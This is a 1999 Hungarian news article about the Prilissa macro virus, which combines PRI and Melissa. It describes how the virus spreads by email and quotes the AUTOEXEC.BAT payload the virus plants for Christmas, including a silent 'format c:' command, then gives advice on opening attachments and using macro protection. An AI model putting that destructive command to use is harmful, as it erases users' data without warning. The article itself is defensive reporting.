Karácsonyi ajándék Prilissától

1999. november 22. 14:34
Két korábbi vírus, a PRI és a Melissa kereszteződéséből született a legújabb veszélyforrás, a Prilissa, amely amellett, hogy megtartja elődjeinek minden "jó tulajdonságát", ráadásként karácsonykor még meg is formázza a megfertőzött gép merevlemezét.
A Melissától örökölte a most terjedő vírus azt a tulajdonságát, hogy "egy nagyon fontos dokumentum" formájában attachmentként terjed, s ha véletlenül kinyitják, akkor 50 helyre automatikusan továbbítja magát. A PRI ehhez színes foltokat helyez el a felhasználó dokumentumaiban, s ehhez jön karácsony reggelén a meglepetés: minden eltűnik a merevlemezről. Az eltüntetést tulajdonképpen mi okozzuk a gép bekapcsolásával. A Prilissa csak az autoexec.bat rutint cseréli ki december 25. reggelén a következőre:

"@echo off"

"@echo Vine...Vide...Vice...Moslem Power Never End..."

"@echo Your Computer Have Just Been Terminated By = CyberNET = Virus !!!"

"ctty nul"

"format c: /autotest /q /u"

Mivel a Windows NT nem használja az AUTOEXEC.BAT-ot, ezért a Windows NT felhasználói ettől a hatástól védve maradnak. Viszont a Windows 95/98 felhasználóinál a következő bekapcsoláskor automatikusan megtörténik a formázás, és utána megjelenik a "jöttem-láttam-győztem" felirat, s a muszlim hatalom örökkévalóságába, az emberi éra végességébe vetett hit hangoztatása.

A legjobb védekezés továbbra is az, hogy még az ismerősöktől kapott levelek esetében sem nyitjuk ki automatikusan a mellékleteket, s ha várunk is valakitől ilyet, amikor megkapjuk, tisztázzuk telefonon, hogy ő volt-e a feladó, valóban tudatosan küldte, s bizonyos a dolog tisztaságában. Ezután se automatikusan nyissuk meg a mellékleteket, hanem a lemezről, mégpedig megnyitás előtt nézzük meg, hogy be van-e állítva a Wordben a makróvédelem, mert ez esetben a makróval ellátott fájlokra külön is figyelmeztet a szoftver. Ha olyan jelzést kapunk, hogy a fájlban makró van, bár az lehet ártatlan is, mindenképpen makró nélkül nyissuk meg a fájlt, így tartalmát ugyanúgy el tudjuk olvasni, s nem vagyunk akkora veszélynek kitéve...

Ha már megtörtént a baj, akkor természetesen a nagyobb vírusirtó szoftverházak termékeihez kell fordulnunk, amelyek természetesen gyorsan felkészülnek minden új jövevényre, csak hát mindezt kizárólag utólag tudják megtenni.

Kövess minket a Facebookon!

Cikkgyűjtő

További fontos híreink

Gépek is rajthoz állnak a most induló Országos IT Megmérettetésen

2024. október 28. 18:06

Megnyitott a Vatera Galéria, a válogatott műtárgyak új platformja

2024. október 22. 15:25

Egy év alatt 45 milliárd forintot loptak el tőlünk a digitális bűnözők

2024. október 15. 16:51

Idén már ezernél is több résztvevőt várnak a Service Design Day-re

2024. október 7. 09:59